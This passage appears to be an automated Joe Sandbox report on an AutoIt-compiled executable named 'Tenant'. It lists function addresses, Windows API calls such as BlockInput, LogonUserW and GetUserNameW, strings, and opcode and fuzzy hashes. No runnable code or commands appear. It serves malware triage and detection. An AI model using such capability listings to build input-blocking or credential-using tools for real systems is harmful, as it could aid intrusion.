                                                                                        • Opcode ID: 397e3ee53a6b5bec5db86b7dd0b3aeba2ee74de22dcc4758e4b4efb60614acd0
                                                                                        • Instruction ID: 5d69d5f3b9a6a2e4f74824423376ab8cfe4861dc16a71e5587fcdd14afd2f1d8
                                                                                        • Opcode Fuzzy Hash: 397e3ee53a6b5bec5db86b7dd0b3aeba2ee74de22dcc4758e4b4efb60614acd0
                                                                                        • Instruction Fuzzy Hash: 1CB09231074208ABCB403B91EC19B8C3F68EF49A62F104010F60D46060CF6254508A99
                                                                                        Function 00B145D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • BlockInput.USER32(00000001), ref: 00B145F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockInput
                                                                                        • String ID:
                                                                                        • API String ID: 3456056419-0
                                                                                        • Opcode ID: a914db75d0830193d6093505170db41ad1abb706ca3b280c797cab8ff41eb528
                                                                                        • Instruction ID: 05939e6d3546291f85b2b4377182a14d1795970035f00b95a3c74a555bb96166
                                                                                        • Opcode Fuzzy Hash: a914db75d0830193d6093505170db41ad1abb706ca3b280c797cab8ff41eb528
                                                                                        • Instruction Fuzzy Hash: A1E0DF312102059FC300AF69E900A8AF7E9EFA8760F008026FC49D7350DFB0E8408B90
                                                                                        Function 00B051E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00B05205
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
                                                                                        • Opcode ID: 38fc981fdbb5440fb55de35a1112535ece0249aabd0a38dade4423c58b94d942
                                                                                        • Instruction ID: e677d377bb712f57503279dba48da3fbe9f957efd9e165664e7474bbbee59f2a
                                                                                        • Opcode Fuzzy Hash: 38fc981fdbb5440fb55de35a1112535ece0249aabd0a38dade4423c58b94d942
                                                                                        • Instruction Fuzzy Hash: 29D092B5164E0A79ED781724AE5FF7B1E88E3017C1F9446C97142AA8C2ECD46C85AE31
                                                                                        Function 00AF9369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AF8FA7), ref: 00AF9389
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        • Opcode ID: 6fb146321f06558a23065682c53e9a79636e1f2ab3a07c807659cbba902f3b3b
                                                                                        • Instruction ID: ecc5b2bf7fe8023e0c8831e626c2ce6d9f6168bd915477ed382e7c04f612df1f
                                                                                        • Opcode Fuzzy Hash: 6fb146321f06558a23065682c53e9a79636e1f2ab3a07c807659cbba902f3b3b
                                                                                        • Instruction Fuzzy Hash: 74D05E3226450EABEF019EA4DC01EAE3B69EB04B01F408111FE15C60A0C775D835AB60
                                                                                        Function 00AE0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00AE0734
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: ef0ac5c4bf36a08362a702266b4b24cf10d9e8adfaefcdc32fa54239664da097
                                                                                        • Instruction ID: 6b3d7a52ca754274c60c0c4d22acb27fa70a52498581598736b6126ab5406dee
                                                                                        • Opcode Fuzzy Hash: ef0ac5c4bf36a08362a702266b4b24cf10d9e8adfaefcdc32fa54239664da097
                                                                                        • Instruction Fuzzy Hash: 2FC04CF581010DDBCB05DBA0D998EEE77BCAB04304F200055A105B2100D7749B448A71
                                                                                        Function 00ACA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00ACA35A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 997b97cd843fc4037b003a7a8a2f3fe532e2a076e2e1f697fbdf8d707046f7be
                                                                                        • Instruction ID: b50da858b7290e89d3643e21d8834a7521186624595747aceb15b878609b6e53
                                                                                        • Opcode Fuzzy Hash: 997b97cd843fc4037b003a7a8a2f3fe532e2a076e2e1f697fbdf8d707046f7be
                                                                                        • Instruction Fuzzy Hash: EFA0113002020CAB8B002B82EC08888BFACEA0A2A0B008020F80C020228B32A8208A88
                                                                                        Function 00B23BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,00B30980), ref: 00B23C65
                                                                                        • IsWindowVisible.USER32(?), ref: 00B23C89
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpperVisibleWindow
                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                        • API String ID: 4105515805-45149045
                                                                                        • Opcode ID: 2dd6a5bedd910206bcaca4019194f20110b9867478cd56c465c46b17303100c9
                                                                                        • Instruction ID: f815a01818deedcf9141701fbab8d49bb47ab77f63ef27a8298248c2e1d6e7bb
                                                                                        • Opcode Fuzzy Hash: 2dd6a5bedd910206bcaca4019194f20110b9867478cd56c465c46b17303100c9
                                                                                        • Instruction Fuzzy Hash: F6D15E30204315CFCB04EF50D691F6A7BE6EF95754F144898F98A5B2A2CB35EE4ACB42
                                                                                        Function 00B2ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00B2AC55
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00B2AC86
                                                                                        • GetSysColor.USER32(0000000F), ref: 00B2AC92
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00B2ACAC
                                                                                        • SelectObject.GDI32(?,?), ref: 00B2ACBB
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00B2ACE6
                                                                                        • GetSysColor.USER32(00000010), ref: 00B2ACEE
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00B2ACF5
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00B2AD04
                                                                                        • DeleteObject.GDI32(00000000), ref: 00B2AD0B
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00B2AD56
                                                                                        • FillRect.USER32(?,?,?), ref: 00B2AD88
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00B2ADB3
                                                                                          • Part of subcall function 00B2AF18: GetSysColor.USER32(00000012), ref: 00B2AF51
                                                                                          • Part of subcall function 00B2AF18: SetTextColor.GDI32(?,?), ref: 00B2AF55
                                                                                          • Part of subcall function 00B2AF18: GetSysColorBrush.USER32(0000000F), ref: 00B2AF6B
                                                                                          • Part of subcall function 00B2AF18: GetSysColor.USER32(0000000F), ref: 00B2AF76
                                                                                          • Part of subcall function 00B2AF18: GetSysColor.USER32(00000011), ref: 00B2AF93
                                                                                          • Part of subcall function 00B2AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2AFA1
                                                                                          • Part of subcall function 00B2AF18: SelectObject.GDI32(?,00000000), ref: 00B2AFB2
                                                                                          • Part of subcall function 00B2AF18: SetBkColor.GDI32(?,00000000), ref: 00B2AFBB
                                                                                          • Part of subcall function 00B2AF18: SelectObject.GDI32(?,?), ref: 00B2AFC8
                                                                                          • Part of subcall function 00B2AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00B2AFE7
                                                                                          • Part of subcall function 00B2AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2AFFE
                                                                                          • Part of subcall function 00B2AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00B2B013
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                        • String ID:
                                                                                        • API String ID: 4124339563-0
                                                                                        • Opcode ID: 7a02c62fbdfbe3a82f72f43b0145d91da7518fc8941978f7b06927d3e4775b6b
                                                                                        • Instruction ID: 7928c484a50cadd010c1a31e62d7dbd994d717f772a0a87a24c6a57db96f6f63
                                                                                        • Opcode Fuzzy Hash: 7a02c62fbdfbe3a82f72f43b0145d91da7518fc8941978f7b06927d3e4775b6b
                                                                                        • Instruction Fuzzy Hash: F6A18C72018711AFD711AF64EC58A6F7BE9FF88321F200A19F966A71A0CB71D844CF52
                                                                                        Function 00AA2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?), ref: 00AA3072
                                                                                        • DeleteObject.GDI32(00000000), ref: 00AA30B8
                                                                                        • DeleteObject.GDI32(00000000), ref: 00AA30C3
                                                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00AA30CE
                                                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00AA30D9
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00ADC77C
                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00ADC7B5
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ADCBDE
                                                                                          • Part of subcall function 00AA1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AA2412,?,00000000,?,?,?,?,00AA1AA7,00000000,?), ref: 00AA1F76
                                                                                        • SendMessageW.USER32(?,00001053), ref: 00ADCC1B
                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00ADCC32
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ADCC48
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ADCC53
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                        • String ID: 0
                                                                                        • API String ID: 464785882-4108050209
                                                                                        • Opcode ID: 526b7472d25335dcfc476f05a14c66d852ffd0f325564a8ccd2aa65db2a8c1a6
                                                                                        • Instruction ID: c712092d734c1c13f83fdfd439e83b6ebcabbe2ab24408761b50aa15143af292
                                                                                        • Opcode Fuzzy Hash: 526b7472d25335dcfc476f05a14c66d852ffd0f325564a8ccd2aa65db2a8c1a6
                                                                                        • Instruction Fuzzy Hash: DA12CF31604602EFCB24DF24C894BA9BBF5BF05321F54456AF586CB2A2CB31ED42DB91
                                                                                        Function 00AB27FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                        • API String ID: 2660009612-1645009161
                                                                                        • Opcode ID: 54c940777cd9ad41c70871ac978ff4c1962686269433f68764afb1661b2e5589
                                                                                        • Instruction ID: d95fb89746f668038f6429c60f196443f55ee8e6edf2e5f4e1cbd46e29f0f8c1
                                                                                        • Opcode Fuzzy Hash: 54c940777cd9ad41c70871ac978ff4c1962686269433f68764afb1661b2e5589
                                                                                        • Instruction Fuzzy Hash: 42A17D31A00209ABCB24AF61DD52FBE77B8EF45B40F24416AF805AA293EB719E51D750
                                                                                        Function 00B17B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000), ref: 00B17BC8
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B17C87
                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B17CC5
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B17CD7
                                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B17D1D
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00B17D29
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B17D6D
                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B17D7C
                                                                                        • GetStockObject.GDI32(00000011), ref: 00B17D8C
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B17D90
                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B17DA0
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B17DA9
                                                                                        • DeleteDC.GDI32(00000000), ref: 00B17DB2
                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B17DDE
                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B17DF5
                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B17E30
                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B17E44
                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B17E55
                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B17E85
                                                                                        • GetStockObject.GDI32(00000011), ref: 00B17E90
                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B17E9B
                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B17EA5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                        • API String ID: 2910397461-517079104
                                                                                        • Opcode ID: 632c153e77b5345e4b60106329c11a6892a6af6025484f7bd71cf3822176c562
                                                                                        • Instruction ID: 36830a32af27f53c368fcb6854cefd7ac5c4a403d46c295ac54e73a854dc4c93
                                                                                        • Opcode Fuzzy Hash: 632c153e77b5345e4b60106329c11a6892a6af6025484f7bd71cf3822176c562
                                                                                        • Instruction Fuzzy Hash: FDA19171A50609BFEB14DB64DC5AFAE7BB9EF05714F104154FA14A72E0CBB4AD40CB60
                                                                                        Function 00B0B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00B0B361
                                                                                        • GetDriveTypeW.KERNEL32(?,00B32C4C,?,\\.\,00B30980), ref: 00B0B43E
                                                                                        • SetErrorMode.KERNEL32(00000000,00B32C4C,?,\\.\,00B30980), ref: 00B0B59C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        • Opcode ID: 8a9840ae6ef1e713f908cc67a04eee84452a02e083afae9c1f67a66eaa670dfa
                                                                                        • Instruction ID: d5298197137cea62dda1c7066d8fdaf40f5a279e006b4e219ac0a7e934fe17a7
                                                                                        • Opcode Fuzzy Hash: 8a9840ae6ef1e713f908cc67a04eee84452a02e083afae9c1f67a66eaa670dfa
                                                                                        • Instruction Fuzzy Hash: BB519630B84209EBCB00EB60DDA2E7D7FE0EB59741B2480D5F806A72E1DB71AE45CB55
                                                                                        Function 00B2A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00B2A0F7
                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B2A1B0
                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00B2A1CC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: 0
                                                                                        • API String ID: 2326795674-4108050209
                                                                                        • Opcode ID: 35d1b09047521acac802ef4c986573b974d1debe178f685657ff75ab2a3e5cb0
                                                                                        • Instruction ID: 2d4a25bb6f7aa8d507c7e0d0bef21a8e7816c522f52a4d384546ce7ae08e24cb
                                                                                        • Opcode Fuzzy Hash: 35d1b09047521acac802ef4c986573b974d1debe178f685657ff75ab2a3e5cb0
                                                                                        • Instruction Fuzzy Hash: D6020F30108320AFD715CF14E899BABBBE4FF89B14F04859DF999972A1CB75D844CB52
                                                                                        Function 00B2AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 00B2AF51
                                                                                        • SetTextColor.GDI32(?,?), ref: 00B2AF55
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00B2AF6B
                                                                                        • GetSysColor.USER32(0000000F), ref: 00B2AF76
                                                                                        • CreateSolidBrush.GDI32(?), ref: 00B2AF7B
                                                                                        • GetSysColor.USER32(00000011), ref: 00B2AF93
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2AFA1
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00B2AFB2
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00B2AFBB
                                                                                        • SelectObject.GDI32(?,?), ref: 00B2AFC8
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00B2AFE7
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2AFFE
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00B2B013
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B2B05F
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B2B086
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00B2B0A4
